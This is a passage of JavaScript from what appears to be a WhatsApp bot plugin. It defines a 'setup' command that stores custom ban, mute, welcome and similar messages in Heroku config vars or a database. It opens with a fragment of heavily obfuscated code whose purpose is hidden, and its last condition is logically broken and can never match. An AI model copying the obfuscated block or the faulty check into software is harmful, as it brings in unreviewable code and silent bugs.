_0x3fce04=_0x3ecaa0[_0x698ed4(-0x18d,-0x12d,-0x188,-0x215,-0x22e)][_0x1a1c30(0x140,0x87,0xcb,0xd4,0x4f)+'t'](_0x356c1d,_0x2b22cc[_0xb32993]);}else _0x3ecaa0[_0x3159dc(0x318,0x309,0x28f,0x2e2,0x2b8)](_0x25c277,0x2e*0xcc+-0x12d2+-0x5f2*0x3);}}}catch(_0x543319){}}
}));


Amdi.operate({pattern: 'setup ?(.*)', fromMe: true, desc: Lang.SETUP_DESC, dontAddCommandList: true, deleteCommand: false}, (async (message, match) => {

    if (match[1] == '') {
        return await message.client.sendMessage(message.jid, Lang.NO_TYPE, MessageType.text); 
    }
    else if (!message.reply_message) {
        return await message.client.sendMessage(message.jid, Lang.NEED_TEXT, MessageType.text); 
    }
    else if (match[1] == 'ban' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['BAN_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (match[1] == 'welcome' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await sql.setMessage(message.jid, 'welcome', message.reply_message.text)
        await message.client.sendMessage(message.jid, Lang.GR_DEL, MessageType.text);
    }
    else if (match[1] == 'goodbye' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await sql.setMessage(message.jid, 'goodbye', message.reply_message.text)
        await message.client.sendMessage(message.jid, Lang.GR_DEL, MessageType.text);
    }
    else if (match[1] == 'mute' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['MUTE_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (match[1] == 'unmute' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['UNMUTE_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (match[1] == 'add' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['ADD_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (match[1] == 'kickme' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['KICKME_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (match[1] == 'afk' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['AFK_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (match[1] == 'alive' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['ALIVE_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (match[1] == 'demote' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['DEMOTE_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (match[1] == 'promote' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['PROMOTE_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (match[1] == 'block' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['BLOCK_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (match[1] == 'unblock' && message.reply_message) {
        await message.client.sendMessage(message.jid, Lang.SUCC, MessageType.text);
        await new Promise(r => setTimeout(r, 1200));
        await message.client.sendMessage(message.jid, Lang.SUCC_AF, MessageType.text);
        await heroku.patch(baseURI + '/config-vars', { 
            body: { 
                ['UNBLOCK_MESSAGE']: message.reply_message.text
            } 
        });
    }
    else if (!match[1] == 'unblock' || !match[1] == 'welcome' || !match[1] == 'goodbye' || !match[1] == 'add' || !match[1] == 'block' || !match[1] == 'mute' || !match[1] == 'unmute' || !match[1] == 'afk' || !match[1] == 'alive' || !match[1] == 'demote' || !match[1] == 'promote' || !match[1] == 'ban' || !match[1] == 'kickme' && message.reply_message) {
        return await message.client.sendMessage(message.jid, Lang.WHY, MessageType.text);
    }
}));
